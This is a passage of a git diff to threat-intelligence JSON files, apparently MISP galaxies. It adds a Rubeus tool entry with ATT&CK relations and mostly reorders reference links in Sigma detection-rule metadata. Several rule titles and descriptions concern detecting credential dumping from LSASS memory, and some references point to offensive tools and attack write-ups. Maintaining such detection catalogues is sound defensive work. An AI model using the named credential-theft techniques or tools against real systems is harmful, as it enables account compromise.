+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "768dce68-8d0d-477a-b01d-0eea98b963a1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d273434a-448e-4598-8e14-607f4a0d5e27",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "e33267fe-099f-4af2-8730-63d49f8813b2",
+ "value": "Rubeus - S1071"
+ },
{
"description": "[Cachedump](https://attack.mitre.org/software/S0119) is a publicly-available tool that program extracts cached password hashes from a system’s registry. (Citation: Mandiant APT1)",
"meta": {
@@ -3003,6 +3331,9 @@
"refs": [
"https://attack.mitre.org/software/S0174",
"https://github.com/SpiderLabs/Responder"
+ ],
+ "synonyms": [
+ "Responder"
]
},
"related": [
@@ -3189,13 +3520,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "bf96a5a3-3bce-43b7-8597-88545984c07b",
"tags": [
@@ -3211,14 +3535,14 @@
"type": "uses"
},
{
- "dest-uuid": "c4ad009b-6e13-4419-8d21-918a1652de02",
+ "dest-uuid": "d336b553-5da9-46ca-98a8-0b23f49fb447",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "d336b553-5da9-46ca-98a8-0b23f49fb447",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -3728,8 +4052,8 @@
"refs": [
"https://attack.mitre.org/software/S0332",
"https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html",
- "https://www.fortinet.com/blog/threat-research/remcos-a-new-rat-in-the-wild-2.html",
- "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/"
+ "https://web.archive.org/web/20180124082756/https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/",
+ "https://www.fortinet.com/blog/threat-research/remcos-a-new-rat-in-the-wild-2.html"
],
"synonyms": [
"Remcos"
@@ -5009,13 +5333,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "b7dc639b-24cd-482d-a7f1-8897eda21023",
"tags": [
@@ -5079,6 +5396,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48",
"tags": [
@@ -6393,6 +6717,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "b4409cd8-0da9-46e1-a401-a241afd4d1cc",
"tags": [
@@ -6407,6 +6738,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d94b3ae9-8059-4989-8e9f-ea0f601f80a7",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "e24fcba8-2557-4442-a139-1ee2f2e784db",
"tags": [
@@ -6542,5 +6880,5 @@
"value": "Mythic - S0699"
}
],
- "version": 27
+ "version": 28
}
diff --git a/clusters/sigma-rules.json b/clusters/sigma-rules.json
index e56193c..3a055b2 100644
--- a/clusters/sigma-rules.json
+++ b/clusters/sigma-rules.json
@@ -76,8 +76,8 @@
"logsource.category": "firewall",
"logsource.product": "No established product",
"refs": [
- "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
"https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
+ "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
"https://www.cisecurity.org/controls/cis-controls-list/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_cleartext_protocols.yml"
],
@@ -99,8 +99,8 @@
"logsource.category": "firewall",
"logsource.product": "No established product",
"refs": [
- "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation",
"https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195",
+ "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation",
"https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_apt_equationgroup_c2.yml"
],
"tags": [
@@ -134,10 +134,10 @@
"logsource.category": "dns",
"logsource.product": "No established product",
"refs": [
- "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/",
- "https://core.telegram.org/bots/faq",
- "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/",
"https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/",
+ "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/",
+ "https://core.telegram.org/bots/faq",
"https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_telegram_api.yml"
],
"tags": [
@@ -246,8 +246,8 @@
"logsource.category": "dns",
"logsource.product": "No established product",
"refs": [
- "https://twitter.com/stvemillertime/status/1024707932447854592",
"https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1",
+ "https://twitter.com/stvemillertime/status/1024707932447854592",
"https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_txt_exec_strings.yml"
],
"tags": [
@@ -1209,9 +1209,9 @@
"logsource.category": "No established category",
"logsource.product": "zeek",
"refs": [
- "https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf",
"https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp",
"https://msrc.microsoft.com/update-guide/vulnerability/ADV210003",
+ "https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf",
"https://threatpost.com/microsoft-petitpotam-poc/168163/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml"
],
@@ -1590,9 +1590,9 @@
"logsource.category": "No established category",
"logsource.product": "zeek",
"refs": [
- "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/",
"https://github.com/Maka8ka/NGLite",
"https://github.com/nknorg/nkn-sdk-go",
+ "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_nkn.yml"
],
"tags": [
@@ -1649,8 +1649,8 @@
"logsource.category": "No established category",
"logsource.product": "zeek",
"refs": [
- "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1",
"https://twitter.com/_dirkjan/status/1309214379003588608",
+ "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1",
"https://dirkjanm.io/a-different-way-of-abusing-zerologon/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml"
],
@@ -1726,11 +1726,11 @@
"logsource.category": "No established category",
"logsource.product": "zeek",
"refs": [
- "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29",
- "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek",
"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527",
- "https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/",
"https://old.zeek.org/zeekweek2019/slides/bzar.pdf",
+ "https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/",
+ "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek",
+ "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29",
"https://github.com/corelight/CVE-2021-1675",
"https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml"
],
@@ -1863,10 +1863,10 @@
"logsource.category": "No established category",
"logsource.product": "zeek",
"refs": [
- "https://twitter.com/neu5ron/status/1346245602502443009",
- "https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS",
- "https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma",
"https://tools.ietf.org/html/rfc2929#section-2.1",
+ "https://twitter.com/neu5ron/status/1346245602502443009",
+ "https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma",
+ "https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS",
"https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_susp_zbit_flag.yml"
],
"tags": [
@@ -2175,9 +2175,9 @@
"logsource.category": "application",
"logsource.product": "jvm",
"refs": [
- "https://rules.sonarsource.com/java/RSPEC-2755",
- "https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing",
"https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs",
+ "https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing",
+ "https://rules.sonarsource.com/java/RSPEC-2755",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/jvm/java_xxe_exploitation_attempt.yml"
],
"tags": [
@@ -2210,8 +2210,8 @@
"logsource.category": "application",
"logsource.product": "jvm",
"refs": [
- "https://secariolabs.com/research/analysing-and-reproducing-poc-for-log4j-2-15-0",
"https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs",
+ "https://secariolabs.com/research/analysing-and-reproducing-poc-for-log4j-2-15-0",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/jvm/java_jndi_injection_exploitation_attempt.yml"
],
"tags": [
@@ -2313,10 +2313,10 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://github.com/zeronetworks/rpcfirewall",
+ "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3",
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md",
- "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3",
+ "https://github.com/zeronetworks/rpcfirewall",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml"
],
"tags": [
@@ -2349,8 +2349,8 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://github.com/zeronetworks/rpcfirewall",
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
+ "https://github.com/zeronetworks/rpcfirewall",
"https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78",
"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_recon.yml"
@@ -2375,9 +2375,9 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931",
"https://github.com/zeronetworks/rpcfirewall",
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
+ "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931",
"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml"
],
@@ -2401,10 +2401,10 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://github.com/zeronetworks/rpcfirewall",
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md",
"https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9",
+ "https://github.com/zeronetworks/rpcfirewall",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml"
],
"tags": [
@@ -2437,9 +2437,9 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931",
"https://github.com/zeronetworks/rpcfirewall",
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
+ "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931",
"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml"
],
@@ -2481,10 +2481,10 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md",
"https://github.com/zeronetworks/rpcfirewall",
- "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
"https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN",
+ "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md",
+ "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml"
],
"tags": [
@@ -2517,8 +2517,8 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://github.com/zeronetworks/rpcfirewall",
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
+ "https://github.com/zeronetworks/rpcfirewall",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_eventlog_recon.yml"
],
"tags": [
@@ -2541,9 +2541,9 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931",
"https://github.com/zeronetworks/rpcfirewall",
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
+ "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931",
"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml"
],
@@ -2585,9 +2585,9 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://github.com/zeronetworks/rpcfirewall",
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
"https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9",
+ "https://github.com/zeronetworks/rpcfirewall",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml"
],
"tags": [
@@ -2628,9 +2628,9 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931",
"https://github.com/zeronetworks/rpcfirewall",
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
+ "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931",
"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml"
],
@@ -2672,11 +2672,11 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://github.com/zeronetworks/rpcfirewall",
- "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527",
"https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8",
- "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md",
+ "https://github.com/zeronetworks/rpcfirewall",
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
+ "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md",
+ "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527",
"https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml"
],
@@ -2700,9 +2700,9 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
+ "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md",
"https://github.com/zeronetworks/rpcfirewall",
"https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183",
- "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md",
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml"
],
@@ -2761,9 +2761,9 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931",
"https://github.com/zeronetworks/rpcfirewall",
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
+ "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931",
"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_recon.yml"
],
@@ -2787,8 +2787,8 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://github.com/zeronetworks/rpcfirewall",
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
+ "https://github.com/zeronetworks/rpcfirewall",
"https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78",
"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml"
@@ -2823,10 +2823,10 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://github.com/zeronetworks/rpcfirewall",
- "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md",
+ "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
"https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9",
+ "https://github.com/zeronetworks/rpcfirewall",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml"
],
"tags": [
@@ -2849,9 +2849,9 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931",
"https://github.com/zeronetworks/rpcfirewall",
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
+ "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931",
"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_recon.yml"
],
@@ -2876,8 +2876,8 @@
"logsource.category": "application",
"logsource.product": "velocity",
"refs": [
- "https://antgarsil.github.io/posts/velocity/",
"https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs",
+ "https://antgarsil.github.io/posts/velocity/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/velocity/velocity_ssti_injection.yml"
],
"tags": [
@@ -2931,7 +2931,7 @@
"value": "Potential Credential Dumping Attempt Via PowerShell"
},
{
- "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder",
+ "description": "Detects process access to LSASS memory with suspicious access flags and from a potentially suspicious folder",
"meta": {
"author": "Florian Roth (Nextron Systems)",
"creation_date": "2021/11/27",
@@ -2939,15 +2939,15 @@
"Updaters and installers are typical false positives. Apply custom filters depending on your environment"
],
"filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml",
- "level": "high",
+ "level": "medium",
"logsource.category": "process_access",
"logsource.product": "windows",
"refs": [
+ "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights",
+ "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf",
"https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow",
"https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html",
"https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
- "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights",
- "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml"
],
"tags": [
@@ -2966,7 +2966,7 @@
}
],
"uuid": "fa34b441-961a-42fa-a100-ecc28c886725",
- "value": "LSASS Access from Program in Suspicious Folder"
+ "value": "LSASS Access From Program in Potentially Suspicious Folder"
},
{
"description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.",
@@ -2981,8 +2981,8 @@
"logsource.category": "process_access",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/shantanukhande/status/1229348874298388484",
"https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/",
+ "https://twitter.com/shantanukhande/status/1229348874298388484",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml"
],
"tags": [
@@ -3128,8 +3128,8 @@
"logsource.category": "process_access",
"logsource.product": "windows",
"refs": [
- "https://github.com/hlldz/Invoke-Phant0m",
"https://twitter.com/timbmsft/status/900724491076214784",
+ "https://github.com/hlldz/Invoke-Phant0m",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_invoke_phantom.yml"
],
"tags": [
@@ -3162,9 +3162,9 @@
"logsource.category": "process_access",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/_xpn_/status/1491557187168178176",
"https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz",
"https://twitter.com/mrd0x/status/1460597833917251595",
+ "https://twitter.com/_xpn_/status/1491557187168178176",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_evasion.yml"
],
"tags": [
@@ -3419,8 +3419,8 @@
"logsource.product": "windows",
"refs": [
"https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html",
- "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md",
+ "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html",
"https://research.splunk.com/endpoint/windows_possible_credential_dumping/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump.yml"
],
@@ -3455,10 +3455,10 @@
"logsource.category": "process_access",
"logsource.product": "windows",
"refs": [
- "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow",
"https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html",
- "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf",
"https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
+ "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow",
+ "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml"
],
"tags": [
@@ -3493,11 +3493,11 @@
"logsource.category": "process_access",
"logsource.product": "windows",
"refs": [
+ "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights",
+ "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf",
"https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow",
"https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html",
"https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
- "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights",
- "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml"
],
"tags": [
@@ -3531,11 +3531,11 @@
"logsource.category": "process_access",
"logsource.product": "windows",
"refs": [
+ "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights",
+ "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf",
